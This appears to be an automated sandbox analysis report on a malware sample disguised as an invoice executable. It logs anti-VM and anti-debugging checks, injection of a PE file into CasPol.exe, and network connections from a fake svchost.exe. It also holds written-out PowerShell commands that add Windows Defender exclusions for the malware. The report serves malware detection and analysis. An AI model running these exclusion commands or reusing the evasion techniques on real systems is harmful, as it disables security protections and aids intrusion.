        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        barindex
        Tries to delay execution (extensive OutputDebugStringW loop)Show sources
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeSection loaded: OutputDebugStringW count: 105
        Source: C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4971Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2058Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1523
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 803
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 3816
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 5533
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: foregroundWindowGot 407
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5844Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\svchost.exe TID: 4484Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5460Thread sleep time: -11990383647911201s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5460Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1412Thread sleep time: -7378697629483816s >= -30000s
        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
        Source: powershell.exe, 00000005.00000003.412711238.0000000004F06000.00000004.00000001.sdmpBinary or memory string: Hyper-V
        Source: svchost.exe, 0000000B.00000002.303666210.00000281CA140000.00000002.00000001.sdmp, WerFault.exe, 0000001E.00000002.451017130.00000000053F0000.00000002.00000001.sdmp, svchost.exe, 00000020.00000002.383623669.000001688D940000.00000002.00000001.sdmp, svchost.exe, 00000026.00000002.453425308.0000014BF5F40000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
        Source: WerFault.exe, 0000001E.00000003.418868252.0000000005276000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
        Source: svchost.exe, 0000000B.00000002.303666210.00000281CA140000.00000002.00000001.sdmp, WerFault.exe, 0000001E.00000002.451017130.00000000053F0000.00000002.00000001.sdmp, svchost.exe, 00000020.00000002.383623669.000001688D940000.00000002.00000001.sdmp, svchost.exe, 00000026.00000002.453425308.0000014BF5F40000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
        Source: svchost.exe, 0000000B.00000002.303666210.00000281CA140000.00000002.00000001.sdmp, WerFault.exe, 0000001E.00000002.451017130.00000000053F0000.00000002.00000001.sdmp, svchost.exe, 00000020.00000002.383623669.000001688D940000.00000002.00000001.sdmp, svchost.exe, 00000026.00000002.453425308.0000014BF5F40000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
        Source: explorer.exe, 00000018.00000002.315192830.0000000000BE5000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: WerFault.exe, 0000001E.00000002.447288923.00000000051F0000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW2>a6
        Source: CasPol.exe, 00000019.00000003.323506513.0000000001081000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: powershell.exe, 00000005.00000003.412711238.0000000004F06000.00000004.00000001.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
        Source: svchost.exe, 0000000B.00000002.303666210.00000281CA140000.00000002.00000001.sdmp, WerFault.exe, 0000001E.00000002.451017130.00000000053F0000.00000002.00000001.sdmp, svchost.exe, 00000020.00000002.383623669.000001688D940000.00000002.00000001.sdmp, svchost.exe, 00000026.00000002.453425308.0000014BF5F40000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess information queried: ProcessInformationJump to behavior

        Anti Debugging:

        barindex
        Contains functionality to hide a thread from the debuggerShow sources
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeCode function: 0_2_08396890 NtSetInformationThread ?,00000011,?,?,?,?,?,?,?,0839F0B7,00000000,000000000_2_08396890
        Hides threads from debuggersShow sources
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeThread information set: HideFromDebugger
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeThread information set: HideFromDebugger
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeThread information set: HideFromDebugger
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeThread information set: HideFromDebugger
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeThread information set: HideFromDebugger
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeThread information set: HideFromDebugger
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeThread information set: HideFromDebugger
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeThread information set: HideFromDebugger
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeThread information set: HideFromDebugger
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeThread information set: HideFromDebugger
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeThread information set: HideFromDebugger
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeThread information set: HideFromDebugger
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeThread information set: HideFromDebugger
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeThread information set: HideFromDebugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess queried: DebugPort
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess queried: DebugPort
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: 8_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,8_2_0040289F
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess token adjusted: Debug
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exeProcess token adjusted: Debug
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        System process connects to network (likely due to code injection or exploit)Show sources
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeNetwork Connect: 104.21.71.230 80
        Adds a directory exclusion to Windows DefenderShow sources
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -Force
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe' -Force
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -Force
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -ForceJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe' -ForceJump to behavior
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -Force
        Injects a PE file into a foreign processesShow sources
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeMemory written: unknown base: 400000 value starts with: 4D5A
        Writes to foreign memory regionsShow sources
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000Jump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000Jump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 420000Jump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 422000Jump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: B30008Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeCode function: 8_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,8_2_00401C26
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -ForceJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess created: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /RunJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe' -ForceJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1Jump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe' /SpecialRun 4101d8 5380Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -Force
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5604 -ip 5604
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 2060
        Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
        Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: unknown unknown
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeProcess created: C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /RunJump to behavior
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeQueries volume information: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
